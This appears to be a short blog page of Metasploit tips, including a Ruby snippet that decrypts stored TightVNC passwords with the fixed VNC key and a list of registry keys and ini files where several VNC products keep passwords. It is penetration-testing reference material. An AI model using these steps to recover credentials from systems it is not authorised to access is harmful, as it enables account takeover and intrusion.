Just some tips I found useful

Metasploit

Metasploit related notes..

Running IRB in msfconsole

Installing metasploit using GIT on archlinux, calling irb in msfconsole will fail. Here is a workaround:

msf5 > irb -e '$LOAD_PATH << "/usr/lib/ruby/gems/2.7.0/gems/irb-1.2.1/lib/"'
msf5 > irb
[*] Starting IRB shell...
[*] You are in the "framework" object
>> 

Tight VNC password decryption

    msf5> irb
    >> fixedkey = "\x17\x52\x6b\x06\x23\x4e\x58\x07"
    => "\u0017Rk\u0006#NX\a"
    >> require 'rex/proto/rfb'
    => true
    >> Rex::Proto::RFB::Cipher.decrypt ["<PASSWORDHERE>"].pack('H*'), fixedkey
    => "Secure!\x00"

VNC path

RealVNC

  • HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver
  • Value: Password

TightVNC

  • HKEY_CURRENT_USER\Software\TightVNC\Server

  • HKLM\SOFTWARE\TightVNC\Server\ControlPassword

  • tightvnc.ini

  • vnc_viewer.ini

  • Value: Password or PasswordViewOnly

TigerVNC

  • HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4
  • Value: Password

UltraVNC

  • C:\Program Files\UltraVNC\ultravnc.ini
  • Value: passwd or passwd2
Last updated on Wednesday, May 6, 2020
Published on Wednesday, May 6, 2020